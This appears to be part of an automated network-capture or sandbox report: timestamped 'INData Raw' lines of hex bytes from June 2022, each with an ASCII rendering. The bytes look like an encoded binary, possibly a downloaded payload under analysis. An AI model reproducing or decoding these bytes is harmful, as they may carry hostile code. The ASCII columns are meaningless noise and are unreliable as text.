ea b3 86 25 25 25 66 e2 64 2b 66 2b 66 65 2d 16 fd ea b3 bf 25 25 25 66 3b 64 7f 2d 66 3b 66 77 29 64 3b 66 3b 16 7f 2d
                                Data Ascii: )f~E%f")~A%^5:6he%.^ffh)^aI%f2P)'46.{^fffh{)fF^aI%fKP)'46he%,fd/`T^'%)%%ZfI%fq\d/^_%P-e)%%Pf'he%.{20^fhI-=%A%|5%d+f+}-%%%fd+f+fe-%%%f;d-f;fw)d;f;-
                                2022-06-26 07:43:09 UTC340INData Raw: 65 25 a5 18 28 05 1c 25 25 99 2f 8d f1 c0 1c 25 0d 3f 11 da da 9e c4 d1 37 25 25 c6 c0 66 20 21 36 66 c0 38 9e 66 e5 2e 7b 32 30 5e e9 19 66 ff 5e 9e e2 5e be 21 5e d6 31 58 e0 96 31 25 25 25 5e 0d 29 64 29 49 66 29 49 66 55 5c 0b 21 da da 5a 66 29 49 de eb 64 69 49 29 16 ce 50 e2 d5 dc c4 98 dc 25 25 16 ce ea b3 b5 25 25 25 66 13 06 c6 66 79 49 29 16 f0 45 0b 1c 25 50 51 04 08 45 0b 1c 25 dc 08 41 0b 1c 25 5e 18 41 0b 1c 25 31 ea 68 4a dc 25 25 dc 08 45 0b 1c 25 04 08 41 0b 1c 25 66 03 c4 81 dc 25 25 64 69 49 29 66 69 49 29 1b 25 27 50 3d 66 69 49 29 64 69 49 2d 66 69 49 2d de 8d 2d 66 69 49 2d 0d 2c d0 da da 5e d8 31 a1 fe 66 29 49 de 9e 64 69 49 29 5e a8 27 66 69 49 29 64 4d 66 69 49 29 5e e5 29 0d 67 1b da da c4 ea dc 25 25 66 03 c4 2d dc 25 25 66 d6
                                Data Ascii: e%(%%/%?7%%f !6f8f.{20^f^^!^1X1%%%^)d)If)IfU\!Zf)IdiI)P%%%%%ffyI)E%PQE%A%^A%1hJ%%E%A%f%%diI)fiI)%'P=fiI)diI-fiI--fiI-,^1f)IdiI)^'fiI)dMfiI)^)g%%f-%%f
                                2022-06-26 07:43:09 UTC341INData Raw: 2b a5 5d 47 50 e8 66 2b a5 9d dc 47 50 e0 5e 2b 27 c6 ba 0e c8 66 2b 64 69 49 31 c6 36 66 2b a5 5d 47 50 65 66 2b 75 0d 7b c0 da da 64 2b c6 39 66 2b 75 0d 6f c0 da da 64 e2 66 e2 06 2b de 0d 66 e2 64 2b 66 2b af 3d a9 b6 99 e0 a5 d6 47 50 ba 66 2b a5 5d 25 99 45 66 2b 75 0d 47 c0 da da 64 2b c6 39 66 2b 75 0d 3b c0 da da 64 e2 66 e2 06 2b de 0d 66 e2 64 2b 66 2b a5 5d 45 52 c3 66 69 49 29 66 b0 0d 9d f4 25 25 66 69 49 31 64 2b 66 69 49 29 66 25 64 69 49 35 0e c8 c6 56 66 2b a5 5d 47 50 75 66 2b 75 0d b0 09 da da 64 2b c6 49 66 2b 75 0d a4 09 da da 64 e2 66 2b 16 e2 4e 39 66 2b af 25 66 79 49 35 ad 29 4f da 2b 20 66 2b 16 e2 97 11 66 2b af 3d a9 b6 99 e0 a5 d6 47 50 aa 66 2b a5 5d 25 99 55 66 2b 75 0d 6c 09 da da 64 2b c6 49 66 2b 75 0d 60 09 da da 64 e2
                                Data Ascii: +]GPf+GP^+'f+diI16f+]GPef+u{d+9f+uodf+fd+f+=GPf+]%Ef+uGd+9f+u;df+fd+f+]ERfiI)f%%fiI1d+fiI)f%diI5Vf+]GPuf+ud+If+udf+N9f+%fyI5)O+ f+f+=GPf+]%Uf+uld+If+u`d
                                2022-06-26 07:43:09 UTC342INData Raw: 59 65 25 25 25 a0 53 e1 c7 8c 12 65 25 25 65 9b 5f 46 e6 03 5f 65 25 25 0d 64 29 fe a2 af 63 65 25 25 87 d1 a0 c6 9d 88 1c 65 25 a5 9f f2 92 4b b2 fd 69 65 25 b5 d1 93 57 9d ab 62 6d 65 25 d9 32 2f 1a 3b 8d 84 26 65 25 7c c8 f1 f3 f6 e7 ae 73 65 c5 a9 39 65 3c 2c 34 a9 77 65 ed 80 f4 b5 94 80 4a 80 30 65 5f ea 45 19 02 6a a6 f3 7d 65 a9 e4 b9 1d 9d 14 1a 5c 81 65 c0 e6 94 5b b2 e2 6a 7c 3a 65 ba 73 42 29 a8 a4 17 a4 87 65 bb 47 5c 20 65 a1 4a 21 40 65 c3 90 95 06 cd 88 a0 78 44 65 b0 cb aa da 24 fa 9d e7 ae 65 7e 39 76 a0 3b 86 8e ca 18 1c 05 b1 c4 a5 a4 22 df 6e cd 1c cf f2 0b 5a 06 7c 3b db 37 67 46 30 02 14 68 d2 95 05 a1 67 55 a4 61 be da bb 77 af c2 67 b3 03 d4 78 d6 c6 a3 cf 2c 1e b1 0a 8f 81 f4 21 4b f7 96 1e 9b be f1 17 04 0a a9 5c 4b 69 f7 2f b5
                                Data Ascii: Ye%%%Se%%e_F_e%%d)ce%%e%Kie%Wbme%2/;&e%|se9e<,4weJ0e_Ej}e\e[j|:esB)eG\ eJ!@exDe$e~9v;"nZ|;7gF0hgUawgx,!K\Ki/
                                2022-06-26 07:43:09 UTC344INData Raw: 7b 8b 66 57 8b e4 1b 99 f2 8b 5c 23 25 e5 4e 35 75 66 25 0d 9d da da da 7d 99 e0 64 cc 83 da bc 83 66 2d da 3c 15 9e b5 77 2c 2e a9 f7 a1 de da 75 19 0c f7 68 71 49 35 89 66 3f 64 f4 64 44 2d a2 1c 29 f4 12 65 25 64 1c 31 89 64 2f 36 34 7f 9e c4 5f dc 25 25 66 69 49 51 66 65 31 60 e5 99 33 66 2d d7 5c 75 da 2c 21 7d 0d e4 25 25 25 0d cd 27 25 25 9e 68 65 25 66 35 da 77 1d 9e 66 e5 2e 66 fd 66 9e 66 35 da 77 09 66 9e 36 9e 66 e5 a9 f7 5a dc 9e 75 77 66 35 da 77 0d 7f 7d 9e b5 a5 18 4d e5 1c 25 dc 9b ec 8f 25 8f 25 8f 25 8d ba 1f c8 33 da f0 39 05 1c 25 9e b5 a5 18 4d e5 1c 25 25 99 f2 75 75 77 79 8f 27 8f 25 8d 09 1f c8 33 da f0 39 05 1c 25 5e e9 2d 7d 9e 68 65 25 79 8f dc 8f 25 8d 05 1f c8 33 da f0 39 05 1c 25 5e e9 29 7d 9e 68 65 25 a5 18 4d e5 1c 25 dc
                                Data Ascii: {fW\#%N5uf%}df-<w,.uhqI5f?ddD-)e%d1d/64_%%fiIQfe1`3f-\u,!}%%%'%%he%f5wf.fff5wf6fZuwf5w}M%%%%39%M%%uuwy'%39%^-}he%y%39%^)}he%M%
                                2022-06-26 07:43:09 UTC345INData Raw: 65 29 64 20 21 0e e5 30 8d 38 61 65 25 89 da 55 89 64 45 60 b6 a3 f6 26 64 83 31 66 20 21 66 69 fd 29 64 20 1d 5e 58 1d 25 99 de da 30 1d 60 b6 5a c0 0e e5 7f 34 34 89 64 35 c6 39 c4 1b d6 da da 0d 7c da da da 0d 9d d8 da da 0d a2 d8 da da 3a 83 36 34 34 38 9e 30 66 11 5e e9 1d 2e 7b 32 9a 5d 0b 1c 25 66 22 2d 60 e5 99 79 66 55 0e b6 66 65 29 64 20 21 0e e5 30 8d a8 61 65 25 89 da 55 89 64 45 16 ce a3 3f 66 20 21 66 29 fd 64 20 1d 1e 64 3a 31 5e 58 1d 25 99 de da 30 1d 16 ce 5a 0b 0e e5 7f 34 34 89 64 35 c6 39 c4 ab d6 da da 0d 0c da da da 0d 2d d8 da da 0d 32 d8 da da 3a 83 36 34 34 38 9e 2c 7b 32 e3 5d 0b 1c 25 68 58 e9 94 e6 25 25 25 ce 80 6a e0 7d 0b 1c 25 6a e0 79 0b 1c 25 64 08 71 0b 1c 25 64 f8 75 0b 1c 25 7e 65 0b 1c 25 64 f0 6d 0b 1c 25 68 28 e9
                                Data Ascii: e)d !08ae%UdE`&d1f !fi)d ^X%0`Z44d59|:64480f^.{2]%f"-`yfUfe)d !0ae%UdE?f !f)d d:1^X%0Z44d59-2:6448,{2]%hX%%%j}%jy%dq%du%~e%dm%h(
                                2022-06-26 07:43:09 UTC346INData Raw: 0d 7c f5 da da 38 e7 29 25 b5 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a9 23 da da c6 3a 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da ea 25 25 0d a9 da da da 66 fd 60 b6 a1 ea 68 79 49 29 66 a2 66 a6 0d 1c da da da c6 51 66 b8 de b6 66 a2 66 ae 0d 57 29 25 25 7b 66 e2 66 71 49 29 66 ae 0d 79 da da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d ee 29 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 77 64 07 94 dc 25 25 25 0d d6 23 da da 7f 9e b5 0c a4 60 f7 99 fc 77 5f 2f 99 f2 5f 6f dc 99 ec 5f 6f 27 99 e6 5f 6f de 99 e0 5e e7 29 c6 0d 67 67 67 64 ac 7f 04 ac c4 f1 23 da da 9e 68 65 25 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29 99 33 8b 16 6f 2b 99 e0 5e e7 2d c6 09 5e e7 27 5e e7 27
                                Data Ascii: |8)%.{20\)u^!fd9If`Zf#:h\%%XM{hiI-fqI)%%f`hyI)ffQfffW)%%{ffqI)fyf`X'ff)%%\)5%%8:6wd%%%#`w_/_o_o'_o^)gggd#he%`w/Eo'o)3o+^-^'^'
                                2022-06-26 07:43:09 UTC348INData Raw: 25 25 25 75 0d a9 a6 da da 5e 9e 29 73 50 0d 83 36 9e 68 65 25 60 f7 ea a9 e1 da da da 66 6f 21 ac c4 ea a9 8c da da da 2c 77 75 0d 30 a6 da da 60 e5 ea a9 4c da da da 9e 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a5 da da da c6 38 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da e2 25 25 0d 41 1f da da 66 fd 60 b6 a3 ea 68 79 49 29 66 a2 66 a6 0d 14 25 25 25 c6 4f 66 b8 66 a2 66 ae 0d ad dc 25 25 7b 66 e2 66 71 49 29 66 ae 0d 13 d4 da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d 44 dc 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 66 e5 60 a4 ea a9 31 da da da 75 2c 77 0d cd ef da da 60 e5 ea a9 f1 23 da da 7f da 57 64 27 0d cb ef da da 9e b5 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29
                                Data Ascii: %%%u^)sP6he%`fo!,wu0`L.{20\)u^!fd9If`Zf8h\%%XM{hiI-fqI)%%Af`hyI)ff%%%Offf%%{ffqI)ff`X'ffD%%\)5%%8:6f`1u,w`#Wd'`w/Eo'o)
                                2022-06-26 07:43:09 UTC349INData Raw: da da da 2a 5a 0d 38 c6 57 30 64 b0 64 fd de 81 53 27 64 17 0d fa da da da 2a 5a 15 38 c6 41 66 de 5e 9e 29 0d 42 33 25 25 2a 5a ce c6 e8 66 de 5e 9e 29 0d 45 e2 25 25 2a 5a ce 3a 83 36 9e b5 5e 18 3d e5 1c 25 25 99 e2 da f0 3d e5 1c 25 9e d5 35 0d 60 03 da da 9e 2e 7b 32 30 64 9e 64 fb 0c e5 af 1c dc 68 a1 2d 2f 66 4a 21 0c e5 66 2a 1d 2c 66 2a 29 04 9c a3 e6 64 e7 dc 15 dc ff 0d 1d 03 da da 66 22 29 66 f2 66 37 af 2f a5 d4 2f 99 0c a5 d4 e6 99 18 a5 d4 31 99 24 a5 d4 e8 99 30 a5 d4 33 99 95 a5 d4 ea ea a9 a5 25 25 25 a5 d4 ec ea a9 ad 25 25 25 d5 27 38 3a 83 36 c4 f4 03 da da 66 39 55 dc fd 0d 5e ce da da dd 29 25 25 25 c6 58 66 39 55 dc fd 0d 03 d4 da da dd 29 25 25 25 c6 91 68 39 55 dc fd 0d 2c da da da dd 35 25 25 25 c6 36 0c a4 af 6f dc da 99 ec 27
                                Data Ascii: *Z8W0ddS'd*Z8Af^)B3%%*Zf^)E%%*Z:6^=%%=%5`.{20ddh-/fJ!f*,f*)df")ff7//1$03%%%%%%'8:6f9U^)%%%Xf9U)%%%h9U,5%%%6o'
                                2022-06-26 07:43:09 UTC350INData Raw: 66 3d 60 b6 5a f6 60 b6 58 e2 d5 29 0d 97 b4 da da 66 20 21 66 30 1d 0d 9a da da da c4 3e dc 25 25 0e da 5e 58 0d 25 99 e8 5e 48 0d 29 66 20 0d 66 5d 5e 48 0d 29 66 20 1d ea db 65 dc dc 20 1d 66 20 1d 66 95 27 66 75 2b 60 f7 99 e2 66 27 64 20 1d c6 e0 0e e5 64 20 1d 66 9e d2 13 64 20 11 66 20 11 74 d2 d6 16 15 99 e2 d5 29 0d 37 b4 da da 5e 20 11 2d 5e 58 0d 25 99 2d 66 20 0d 5e 5d dc 50 61 66 20 0d 64 20 09 16 d6 a3 fa 5e 58 1d 25 99 f4 66 20 0d 5e e5 2d 66 ae ea 8a fb de e7 66 aa 06 a6 66 30 1d 0d 02 da da da 68 20 09 66 30 11 0d ed b2 da da 66 20 09 64 20 0d c6 3e 66 20 0d da 2d 66 20 11 0d 3e b2 da da 64 20 0d 64 58 15 16 38 15 58 de 64 38 15 5e 58 1d 25 99 51 66 30 15 ea 8a fb 66 20 0d 5e e5 2d 0e a4 0d 65 01 da da 66 20 15 75 66 30 21 66 37 66 20 0d
                                Data Ascii: f=`Z`X)f !f0>%%^X%^H)f f]^H)f e f f'fu+`f'd d fd f t)7^ -^X%-f ^]Paf d ^X%f ^-fff0h f0f d >f -f >d dX8Xd8^X%Qf0f ^-ef uf0!f7f
                                2022-06-26 07:43:09 UTC352INData Raw: 0d e0 25 25 25 68 60 ba 23 da da df e0 dc 25 25 0d 5c d8 da da 68 20 0d 75 68 20 13 75 8f 25 8f 25 68 60 ba 23 da da 75 66 20 1d 75 0d 04 96 da da 60 e5 99 47 68 20 0d 75 68 20 13 75 8f 25 8f 25 8d f1 7d 65 25 66 20 1d 75 0d e6 96 da da 60 e5 99 29 eb 20 13 25 eb 20 17 25 0e e5 7f 34 34 89 64 35 8d 32 32 65 25 66 20 1d 75 0d b4 df da da 9e c4 0a 07 da da c6 ca 8d e0 dc 25 25 66 20 21 75 68 60 ba 23 da da 75 0d c9 df da da 8f e0 68 20 ce 75 8f de 0d 5a df da da 75 0d 2c df da da 0e b6 a5 98 ba 23 da da 25 ea a9 d4 25 25 25 a5 58 ce 25 50 2f a5 58 13 25 ea a9 c4 25 25 25 68 60 ba 23 da da 75 0d 93 df da da 68 70 ba 23 da da de e7 64 20 09 c6 de da 28 09 66 20 09 a5 5d 53 99 e6 68 60 ba 23 da da 16 20 09 50 0f 68 60 ba 23 da da 16 20 09 ea a9 86 25 25 25 da
                                Data Ascii: %%%h`#%%\h uh u%%h`#uf u`Gh uh u%%}e%f u`) % %44d522e%f u%%f !uh`#uh uZu,#%%%%X%P/X%%%%h`#uhp#d (f ]Sh`# Ph`# %%%
                                2022-06-26 07:43:09 UTC353INData Raw: 5e e9 15 2e 7b 64 28 19 64 30 1d 64 20 21 5e 58 19 25 50 2f 0e e5 64 20 15 c4 e4 dc 25 25 a2 20 15 da da da da 0e e5 0e 1b 5e 58 21 25 ea a9 84 25 25 25 c4 a7 25 25 25 66 30 19 0e a4 af 31 57 6b 1b 9c a5 99 91 16 50 2d ea 5e fd 25 25 25 5e bc 1a 1b 9c 45 99 53 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 96 25 25 25 16 50 2d ea 5e d7 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b e6 ac 66 ef 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 68 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b 8b e6 ac 66 28 21 8b 64 39 1c c6 e2 66 30 21 8b 64 31 67 65 16 50 2d 4e e4 16 20 1d ea a7 95 da da da 16 20 1d 97 29 66 20 1d 6d 66 30 21 8b a2 29 67 25 25 c6 22 16 50 2d 4e 67 66 30 19 af 39 57 6b 1b e7 a5 99 55 16 50 2d 4e 10 a5 07 1a 1b e7 45 99 39 66 30 19 af 39
                                Data Ascii: ^.{d(d0d !^X%P/d %% ^X!%%%%%%%f01WkP-^%%%^ESf09Wkf`%%%P-^%%%\%%%+ff09Wkf`h%%%\%%%+f(!d9f0!d1geP-N )f mf0!)g%%"P-Ngf09WkUP-NE9f09
                                2022-06-26 07:43:09 UTC354INData Raw: 7c c1 e5 1c 25 75 0d 68 da da da 7f 36 9e 66 e5 dd 31 25 25 25 60 e5 99 fa 0d 87 da da da 7e c1 e5 1c 25 0d bd da da da 7c c1 e5 1c 25 75 0d 38 da da da 7e 99 0b 1c 25 9e 68 65 25 2c dd 31 25 25 25 60 e5 99 4b 5e 18 c1 e5 1c 25 da 99 f8 7c c1 e5 1c 25 75 0d 5b da da da 64 29 49 5e 61 49 25 99 e4 66 29 49 75 0d 31 da da da 7f 9e 66 e5 dd 31 25 25 25 60 e5 99 f4 0d e3 da da da 5e 18 c1 e5 1c 25 da 99 e6 7c c1 e5 1c 25 75 0d 1b 23 da da 9e b5 af e8 89 0b 1c 25 7c c1 e5 1c 25 a9 a4 50 4b 89 66 f0 51 25 25 25 66 29 a7 9e 0d e8 da da da 7c c1 e5 1c 25 75 0d f7 23 da da 60 e5 99 dc 9e 7c 99 0b 1c 25 9e 75 0d 9c 23 da da 60 e5 99 b6 9e dd c5 e5 1c 25 0d 9b d2 da da 9e b5 df c5 e5 1c 25 5e 58 31 dc 50 4f 75 77 eb e0 89 0b 1c 25 dc 66 28 2d 64 e8 8d 0b 1c 25 64 6f
                                Data Ascii: |%uh6f1%%%`~%|%u8~%he%,1%%%`K^%|%u[d)I^aI%f)Iu1f1%%%`^%|%u#%|%PKfQ%%%f)|%u#`|%u#`%%^X1POuw%f(-d%do
                                2022-06-26 07:43:09 UTC356INData Raw: 1d 64 20 21 66 28 1d 1c 66 20 21 66 f0 25 35 65 25 0d 88 09 da da 66 20 19 0d ac b8 da da 0e e5 30 8d 9f 42 65 25 89 da 55 89 64 45 eb 20 ce 25 66 50 1d 6b 73 60 1b a1 55 6b 0e da 66 38 21 66 20 19 0d dd b8 da da 75 66 de 0d d5 b8 da da 75 0d 67 23 da da 60 e5 50 e4 66 20 2d 64 5d eb 20 ce dc 22 5e 9e 29 73 50 fb 0e e5 7f 34 34 89 64 35 8d 5c 42 65 25 68 20 19 0d 9c fd da da 66 20 21 66 28 1d 1c 66 f0 25 35 65 25 0d ce 07 da da 9e c4 e0 f7 da da c6 03 af 20 ce 66 58 09 66 50 0d 66 38 11 66 c0 38 e7 29 25 b5 0e f7 84 25 25 25 29 99 2b 5c ef 25 27 25 25 84 25 25 25 45 99 08 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 65 c6 1c 5e ef 45 c6 61 84 25 25 25 a5 99 2d 5c ef a5 25 25 25 c6 08 5e ef 35 66 e7 9e 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 29
                                Data Ascii: d !f(f !f%5e%f 0Be%UdE %fPks`Ukf8!f ufug#`Pf -d] "^)sP44d5\Be%h f !f(f%5e% fXfPf8f8)%%%%)+\%'%%%%%E%%%e%%%^e^Ea%%%-\%%%^5f%%%e%%%^)
                                2022-06-26 07:43:09 UTC357INData Raw: 35 8d 83 91 65 25 68 20 19 66 f0 41 8b 65 25 0d ef b8 da da 9e c4 4d a8 da da c6 0f 66 20 05 3a 83 36 66 c0 38 9e 30 66 11 0e e5 30 8d 68 91 65 25 89 da 55 89 64 45 da e0 a5 0b 1c 25 0e e5 7f 34 34 89 64 35 8d b9 91 65 25 9e c4 17 f1 da da c6 1d 38 9e 66 e5 5e 08 a5 0b 1c 25 dc 9e 8d 0b 1c 25 15 da 25 25 8d 0b 1c 25 cc da 25 25 8d 0b 1c 25 17 da 25 25 8d 0b 1c 25 ce da 25 25 8d 0b 1c 25 19 da 25 25 8d 0b 1c 25 d0 da 25 25 8d 0b 1c 25 1b da 25 25 8d 0b 1c 25 d2 da 25 25 8d 0b 1c 25 1d da 25 25 8d 0b 1c 25 d4 da 25 25 8d 0b 1c 25 1f da 25 25 8d 0b 1c 25 d6 da 25 25 8d 0b 1c 25 21 da 25 25 8d 0b 1c 25 d8 da 25 25 8d 0b 1c 25 23 da 25 25 8d 0b 1c 25 da da 25 25 8d 0b 1c 25 05 da 25 25 8d 0b 1c 25 bc da 25 25 8d 0b 1c 25 07 da 25 25 8d 0b 1c 25 be da 25 25 8d
                                Data Ascii: 5e%h fAe%Mf :6f80f0he%UdE%44d5e%8f^%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%!%%%%%%#%%%%%%%%%%%%%%%%%
                                2022-06-26 07:43:09 UTC358INData Raw: 25 25 25 25 25 f1 4c 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 37 20 20 9d 99 40 97 93 3c 91 20 9d 3e 40 95 99 44 4a 93 b5 51 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 51 97 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 24 93 99 20 97 97 4a 97 66 e5 a9 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 a9 97 65 25 35 25 25 25 05 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 2f 20 69 44 9b 67 54 7f 40 97 4a b5 01 97 65 25 25 25 25 25 25 25
                                Data Ascii: %%%%%Le%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye%7 @< >@DJQe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Qe%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% $ Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%5%%%Le%[e%[e%[e%[e%[e%YYe%uYe%Ye%/ iDgT@Je%%%%%%%
                                2022-06-26 07:43:09 UTC360INData Raw: d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 33 20 2e 99 3c 3e 46 2a 9b 40 97 8b 91 4a 52 b5 95 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 95 52 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 1e 4a 93 99 97 4a 91 1e 66 e5 ed 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 ed 52 65 25 31 25 25 25 d5 4a 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e8 20 7b 3c 97 44 3c 93 99 20 97 97 4a 97 66 e5 49 9d 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
                                Data Ascii: [e%[e%[e%[e%[e%YYe%uYe%Ye%3 .<>F*@JRRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% JJfRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%1%%%Je%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D< JfIe%%%%%%%%%%%%%%%%%%%%%%%%
                                2022-06-26 07:43:09 UTC361INData Raw: 32 2e 64 eb 64 b2 e4 e5 99 de 66 65 21 e4 f7 99 de 66 77 21 64 9c 14 ac 9b 27 64 ac 14 a4 ce cb 99 4f af 83 da a5 d6 3c 97 2d a5 d6 9f 52 de a5 c6 45 af 5a da a5 da 3c 97 2d a5 da 9f 52 de a5 ca 45 5d d6 99 fd ea db 9e ea db b2 04 f5 36 3a 83 9e b5 14 f5 99 f4 e4 e5 99 f2 e4 f7 99 39 66 6d 21 16 6f 21 50 31 0d 6e da da da 60 e5 50 de d5 dc 9e 0c e5 9e b5 2e 7b 66 17 66 fd 66 eb 0d f2 eb da da 75 66 eb 0d ea ed da da 75 66 9e 0d e2 eb da da 75 66 9e 0d da a2 da da 75 8f 25 8d 25 29 25 25 0d 87 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 eb 0d ba a0 da da 75 66 eb 0d b2 a2 da da 75 66 9e 0d aa a0 da da 75 66 9e 0d a2 a2 da da 75 8f dc 8d 25 29 25 25 0d 4f 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 fb 66 9e 0d 94 da da da 60 e5 ea b9 e5 83 36 9e b5
                                Data Ascii: 2.ddfe!fw!d'dO<-REZ<-RE]6:9fm!o!P1n`P.{fffufufufu%%)%%^'6.{fffufufufu%)%%O^'6.{ffff`6
                                2022-06-26 07:43:09 UTC362INData Raw: 9c 1c 25 75 66 29 90 6d 9c 1c 25 75 66 a2 0d 0a 9e da da 75 0d 94 bc da da 3a 83 36 9e b5 2e 66 fd 8f 25 8d a5 25 25 25 8f 27 8f 25 8f 25 8d 25 25 25 e5 66 9e 0d 2d 9e da da 75 0d b7 bc da da 36 9e 0d b2 da da da 9e 66 e5 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d a2 07 da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d fe be da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 30 66 11 5e e9 1d 2e 7b 66 17 66 fd 66 20 2d 64 20 1d 66 20 31 64 20 21 7b 68 20 21 75 66 20 1d 75 2e 0d 74 07 da da 64 20 1d 66 20 1d 66 30 21 83 36 34 34 38 e7 2d 25 75 0d ef 05 da da 9e b5 30 66 11 5c e9 d9 23 da da 2e 66 fd 68 60 d9 23 da da 75 66 9e 0d 6b e7 da da 75 0d 4d
                                Data Ascii: %uf)m%ufu:6.f%%%%'%%%%%f-u6f.{2,fff%hiI)u2{.`P)If)I:6.{2,fff%hiI)u2{.`P)If)I:60f^.{fff -d f 1d !{h !uf u.td f f0!6448-%u0f\#.fh`#ufkuM
                                2022-06-26 07:43:09 UTC364INData Raw: 0c e5 64 20 21 de 28 35 64 58 1d 0c e5 64 20 19 64 20 15 64 20 11 e4 f7 99 e8 14 f3 99 e4 d1 61 00 99 33 cf 6f 50 ce 64 1d 06 20 1d c4 fe de 25 25 14 f3 99 17 d1 61 00 99 c4 68 83 23 64 38 0d ad 20 c2 61 08 50 e0 14 f3 99 01 d1 0d a3 25 25 25 61 5f 50 2f 64 38 19 14 f3 99 a6 d1 c6 bc 64 38 05 96 da da da da 61 53 50 2f 14 f3 99 dd d1 0d 7f 25 25 25 64 38 01 64 50 fd 2c 77 0d 70 25 25 25 7f 66 38 05 04 a6 4e 27 0c b6 a5 58 c2 08 50 2f 04 ef 4e 29 dc ac 0c f7 ce c9 62 b4 04 ef 4e 29 dc ac 0c f7 d5 45 ce cf 62 b4 04 ef 4e 29 dc ac 0c f7 ce c9 5e 58 15 25 99 2f 77 68 20 15 0d 41 da da da 7f 34 66 50 fd c4 22 da da da 0c b6 61 4f 99 47 61 55 97 18 61 14 52 14 44 b6 2f 25 25 25 51 55 ea db e5 dc 9e 14 f3 99 de d1 c6 09 7d c4 55 da da da 66 20 19 16 20 2d 5a 37
                                Data Ascii: d !(5dXd d d a3oPd %%ah#d8 aP%%%a_P/d8d8aSP/%%%d8dP,wp%%%f8N'XP/N)bN)EbN)^X%/wh A4fP"aOGaUaRD/%%%QU}Uf -Z7
                                2022-06-26 07:43:09 UTC365INData Raw: 25 ad 20 17 a2 20 11 25 25 25 25 dd ee 25 25 25 a5 d4 25 50 f2 66 20 31 5e 1d 27 58 e0 dd 27 25 25 25 5e 1d 37 a3 e0 dd 37 25 25 25 64 20 31 75 dd ea 02 25 25 a5 58 35 27 97 de 66 20 2d 75 68 20 f9 0d 38 27 25 25 66 58 21 ea 92 20 f9 08 da 5a 25 25 5e 1d 27 4e 3f 64 9c 0d 95 25 25 25 68 d9 24 e5 b1 65 25 de 50 11 94 de 25 25 25 ce c9 c6 08 68 50 b2 ea db 38 35 a5 d6 dc 99 35 a5 d6 29 52 e4 ea 9a 20 f9 16 20 31 a3 27 8e 25 68 41 78 d1 b1 65 25 de 38 11 66 f6 de 38 11 da ae 64 1d 06 20 21 36 83 3a c4 cc dc 25 25 b4 b1 65 25 10 68 65 25 91 68 65 25 91 68 65 25 fb 68 65 25 24 73 6b 73 1c 73 d1 2d e5 50 de d5 55 73 9e a5 58 fb 25 99 de d5 08 cf 9e 0d cc da da da ea 9a 28 f9 0c f7 16 28 31 5a f8 5e d4 d8 a1 3d e4 a4 5a 3f d5 55 cf a5 63 25 99 5f af 20 d6 cf d2
